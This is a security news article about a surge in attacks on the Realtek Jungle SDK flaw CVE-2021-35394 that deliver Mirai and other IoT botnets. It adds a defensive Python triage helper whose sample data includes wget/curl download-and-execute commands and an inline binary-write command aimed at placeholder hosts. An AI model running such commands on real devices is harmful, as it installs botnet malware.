Researchers Warn of an Attack Surge Exploiting a Realtek Vulnerability
Researchers have reported a surge in the number of attacks attempting to exploit a Realtek Jungle SDK remote code execution flaw tracked as CVE-2021-35394, which has a CVSS score of 9.8. Nearly 134 million exploit attempts were recorded up to last month, December 2022.
Realtek Jungle SDK version v2.x through v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as a ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.
The experts warned that the attacks conducted by multiple threat actors are still ongoing. Many of these attacks attempted to deliver malware to vulnerable IoT devices. Most of the malware samples belong to Mirai, Gafgyt, and Mozi families.
Researchers observed a new distributed IoT DDoS botnet developed in Golang, tracked as RedGoBot.
- In the first campaign, observed in early September 2022, the threat actor tried to deliver a shell script downloader, znet.sh, from 185.216.71[.]157 using wget.
- In the second campaign, observed in November 2022, the threat actor used a shell script with wget and curl to download the following botnet clients from 185.246.221[.]220.
The analysis of the attacks in the wild revealed the use of the following three types of payloads:
- A script executes a shell command on the targeted server (mostly from the Mirai).
- An injected command directly writes the binary payload to a file and then executes it.
- An injected command directly reboots the targeted server to trigger a denial-of-service condition.
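As an added example (not part of the report), a small Python triage helper that sorts captured injected command strings into the three payload types listed above and pulls out the hosts they download from, so a defender can count payload types and collect download hosts from a batch of exploit attempts. The sample commands are constructed, and the addresses are TEST-NET placeholders rather than real indicators.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample injected commands modelled on the three payload types
# described in the report. Hosts are TEST-NET-1 placeholders, not real IoCs.
SAMPLE_COMMANDS = [
    "cd /tmp; wget http://192.0.2.10/znet.sh; chmod 777 znet.sh; sh znet.sh",
    "curl -O http://192.0.2.20/bot.arm7; chmod +x bot.arm7; ./bot.arm7",
    "echo -ne '\\x7f\\x45\\x4c\\x46' > /tmp/.x; chmod 777 /tmp/.x; /tmp/.x",
    "reboot",
    "ls /tmp",  # benign-looking command, should stay unclassified
]

URL_RE = re.compile(r"https?://([^/\s;|&]+)")           # host part of any URL
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")  # fetch tools
# Signs that a fetched or written file is made executable or invoked.
EXEC_RE = re.compile(r"(\bsh\b|\bbash\b|chmod\s+[+0-7x]+|(^|[;&|]\s*)\./|(^|[;&|]\s*)/tmp/)")
# echo/printf redirected into a file: the binary is written inline, not fetched.
WRITE_RE = re.compile(r"\b(echo|printf)\b[^;|&]*>\s*\S+")
REBOOT_RE = re.compile(r"\b(reboot|shutdown)\b|/proc/sysrq-trigger")


@dataclass
class Verdict:
    payload_type: Optional[str]          # None when no pattern matched
    hosts: List[str] = field(default_factory=list)


def classify(cmd: str) -> Verdict:
    """Map one injected command to a payload type and its download hosts."""
    hosts = URL_RE.findall(cmd)
    if REBOOT_RE.search(cmd):
        return Verdict("reboot-dos", hosts)
    if DOWNLOADER_RE.search(cmd) and EXEC_RE.search(cmd):
        return Verdict("download-and-execute", hosts)
    if WRITE_RE.search(cmd) and EXEC_RE.search(cmd):
        return Verdict("inline-binary-write", hosts)
    return Verdict(None, hosts)


def summarize(commands: List[str]) -> Dict[str, object]:
    """Count payload types and collect distinct download hosts for a batch."""
    counts: Dict[str, int] = {}
    hosts = set()
    for cmd in commands:
        verdict = classify(cmd)
        key = verdict.payload_type or "unclassified"
        counts[key] = counts.get(key, 0) + 1
        hosts.update(verdict.hosts)
    return {"counts": counts, "hosts": sorted(hosts)}
```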
The flaw affects almost 190 device models from 66 different manufacturers, and the attacks originate mainly from the U.S., Vietnam, and Russia, although the use of proxies or VPNs to mask the true origin is not ruled out. This surge can result in a possible supply chain attack that is difficult to detect and remediate.
This research was documented by researchers at Palo Alto.
Indicators of Compromise